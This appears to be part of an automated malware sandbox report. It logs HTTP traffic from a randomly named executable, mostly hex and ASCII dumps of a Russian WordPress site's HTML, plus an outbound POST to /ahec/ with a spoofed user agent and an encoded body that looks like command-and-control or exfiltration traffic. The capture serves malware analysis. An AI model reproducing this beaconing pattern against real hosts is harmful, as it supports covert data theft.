                                                                                                                                                            Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                                                                                                            Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                                                                                                            Dec 8, 2023 14:53:06.360991955 CET1286INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                                                                                                            Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                                                                                                            Dec 8, 2023 14:53:06.361032009 CET1286INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                                                                                                            Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                                                                                                            Dec 8, 2023 14:53:06.361068010 CET1286INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                                                                                                            Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                                                                                                            Dec 8, 2023 14:53:06.361109018 CET1286INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                                                                                                            Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                                                                                                            Dec 8, 2023 14:53:06.361148119 CET1286INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                                                                                                            Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                                                                                                            Dec 8, 2023 14:53:06.361185074 CET1286INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                                                                                                            Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.2" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                                                                                                            Dec 8, 2023 14:53:06.361222982 CET1286INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                                                                                                            Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                                                                                                            Dec 8, 2023 14:53:06.361323118 CET1286INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                                                                                                            Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                                                                                                            Dec 8, 2023 14:53:06.361358881 CET1286INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                                                                                                            Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                                                                                                            Dec 8, 2023 14:53:06.600351095 CET1286INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                                                                                                            Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            43192.168.2.449783185.74.252.11805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:07.878715038 CET10846OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Origin: http://www.altralogos.com
                                                                                                                                                            Referer: http://www.altralogos.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 6f 6d 6d 6c 7a 39 4d 6e 6c 6a 71 4a 33 57 4d 6f 6e 58 34 51 48 35 51 64 31 37 53 45 6d 64 38 79 32 31 45 55 61 66 36 7a 57 50 49 71 54 70 4f 4e 57 67 57 58 39 4e 61 75 4c 50 6b 37 5a 62 6a 4c 44 66 6c 7a 63 39 35 67 36 2f 5a 4a 45 38 4c 6c 33 30 46 46 46 6f 68 72 49 62 30 71 44 63 73 58 59 6c 4f 73 52 4d 39 6d 58 39 76 72 34 5a 47 61 75 49 53 67 66 4e 2f 6b 6e 30 73 42 5a 41 6b 4a 75 5a 69 73 62 42 58 52 62 2f 32 62 33 65 52 42 35 79 46 73 33 47 56 4e 4d 6d 55 66 6a 2f 35 51 45 2b 6e 51 68 65 57 33 79 34 6a 79 51 34 2f 33 77 66 67 5a 50 74 59 53 33 55 52 33 46 70 46 36 51 30 37 4e 4c 58 65 56 6f 45 4a 62 31 6e 65 59 2b 45 44 2f 39 36 4d 70 51 31 44 33 79 39 34 33 31 56 36 50 50 68 57 4f 31 37 31 46 55 70 73 30 30 4d 75 4b 63 61 47 53 72 59 74 65 32 42 74 79 65 71 56 79 79 4c 77 78 54 53 4b 68 50 72 45 68 2f 61 35 6f 79 74 31 63 5a 31 52 73 38 37 6b 6b 71 36 43 41 2b 7a 6a 66 59 7a 46 71 69 77 4b 66 39 47 44 44 4c 56 33 49 6d 61 6d 73 49 44 69 7a 6a 72 63 78 42 58 39 4c 49 74 4b 4b 55 73 67 79 4b 76 4c 56 61 59 68 56 54 64 6a 51 73 45 74 4d 53 6e 43 34 68 4c 30 61 31 46 32 37 36 4a 31 7a 46 66 56 30 73 71 70 69 65 33 4a 41 49 64 45 70 6a 37 54 46 49 58 53 4c 56 52 2f 56 49 43 33 58 77 2f 46 35 62 36 5a 52 58 64 78 62 4c 32 38 4a 72 4f 59 2b 46 47 71 51 55 4d 43 34 46 41 77 5a 34 74 6e 79 4e 72 72 62 46 69 4b 73 43 4d 52 6f 59 6e 55 70 31 4a 6e 6c 52 36 53 33 56 38 6d 2b 50 43 56 59 43 65 79 58 71 4f 5a 43 2f 67 39 78 79 73 34 4a 73 43 35 6d 68 42 35 55 71 48 2b 46 4f 39 49 5a 39 61 4f 33 59 71 57 4b 55 54 43 52 39 34 4e 76 73 35 55 54 47 31 64 33 46 77 30 77 6f 33 41 2f 5a 4b 4d 76 33 31 66 6a 4a 78 78 65 78 4e 47 62 78 53 52 58 42 41 2b 62 31 4d 73 65 65 35 77 6d 66 41 69 55 4d 39 35 64 43 2b 67 69 43 6a 75 35 63 71 4c 54 2b 67 61 41 72 6b 38 73 33 2f 6f 65 57 6b 77 66 68 58 57 6a 50 47 4c 43 6d 57 64 51 6d 38 6d 2b 73 42 77 41 37 47 33 2b 65 62 4c 52 7a 6a 4d 69 4e 71 4c 46 34 5a 65 45 72 6c 77 36 67 58 52 7a 67 4a 51 77 45 39 46 45 57 43 66 70 32 57 6f 47 51 45 62 66 4b 30 55 30 67 32 56 56 2b 6d 71 5a 43 42 6d 68 32 67 4a 52 58 4a 32 59 51 76 67 6c 52 77 70 54 76 6c 6a 72 68 76 50 58 62 58 38 70 31 45 68 6c 4a 4e 76 4e 32 57 5a 4f 67 5a 43 78 38 6c 31 6b 39 30 6b 75 61 79 48 66 6c 5a 62 6a 33 74 43 6c 44 48 68 5a 61 4e 49 68 76 50 56 32 71 53 77 6a 6c 56 53 79 55 55 4d 53 31 42 6b 45 4b 6b 2b 55 33 51 6b 39 39 57 39 52 66 75 37 43 37 58 2f 55 46 35 41 2f 61 57 6c 45 75 4b 51 74 4b 4e 71 50 41 78 31 78 4e 4f 4f 44 7a 45 65 78 31 30 74 76 65 75 37 6b 33 63 72 46 44 69 2f 71 6d 37 67 34 59 43 77 6f 2b 59 44 63 53 77 31 49 63 62 74 43 4e 61 2f 36 46 34 77 2b 48 77 59 2f 7a 73 63 33 6c 4b 47 6f 6c 58 6c 55 37 4b 6b 32 67 4b 44 59 70 45 4a 51 48 75 6b 58 61 75 4b 6b 47 70 45 76 30 4d 4a 59 54 58 55 52 79 30 30 59 6b 76 66 57 61 63 31 66 42 69 58 65 30 75 47 69 76 2b 51 70 68 78 74 63 63 65 76 76 45 58 62 4f 39 47 37 4c 64 56 39 68 48 4f 58 32 4b 39 50 4a 30 57 61 2b 65 4c 33 62 54 4a 2b 58 39 77 67 41 68 45 70 56 50 59 53 6d 65 47 78 79 5a 51 6c 74 35 5a 6f 31 78 71 67 47 70 65 43 6c 39 2b 62 50 39 58 52 57 6f 45 73 78 48 56 55 46 61 44 46 50 31 4d 5a 6a 34 4d 59 50 64 6f 6d 62 42 68 53 67 66 41 72 4d 4d 4d 73 6f 66 76 46 2f 6e 30 57 56 67 4f 76 51 4f 6f 67 6c 42 33 46 34 46 50 71 4d 37 32 56 67 68 30 2f 53 6e 2b 77 43 42 77 55 59 37 36 58 4c 54 4d 4c 46 68 75 57 34 64 6a 75 78 58 58 56 46 34 30 71 46 37 51 63 66 6e 5a 62 6f 49 63 47 6d 51 67 36 55 63 2f 74 4b 53 57 47 69 45 2b 77 71 34 49 78 75 50 42 5a 57 75 47 37 6c 6e 53 62 4f 51 69 41 56 4c 78 62 76 57 77 50 6c 57 4f 45 33 34 4e 50 59 44 79 4b 58 6d 59 63 39 4c 38 55 69 35 34 56 31 74 55 6d 69 35 56 36 78 76 4e 2b 61 50 53 4a 50 6e 76 57 4f 41 6d 43 53 5a 48 78 63 76 50 63 71 4c 6e 4c 6a 33 34 46 78 5a 67 59 6f 30 36 64 2f 7a 6f 64 5a 73 57 57 75 72 67 32 68 56 37 6b 4e 49 78 4f 31 39 36 39 69 4d 52 4b 47 56 65 66 43 6b 2f 39 55 36 49 6a 6c 33 37 51 4b 46 62 52 4c 79 6e 68 33 51 79 55 30 70 79 76 4f 34 53 5a 75
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:53:09.144088984 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:07 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 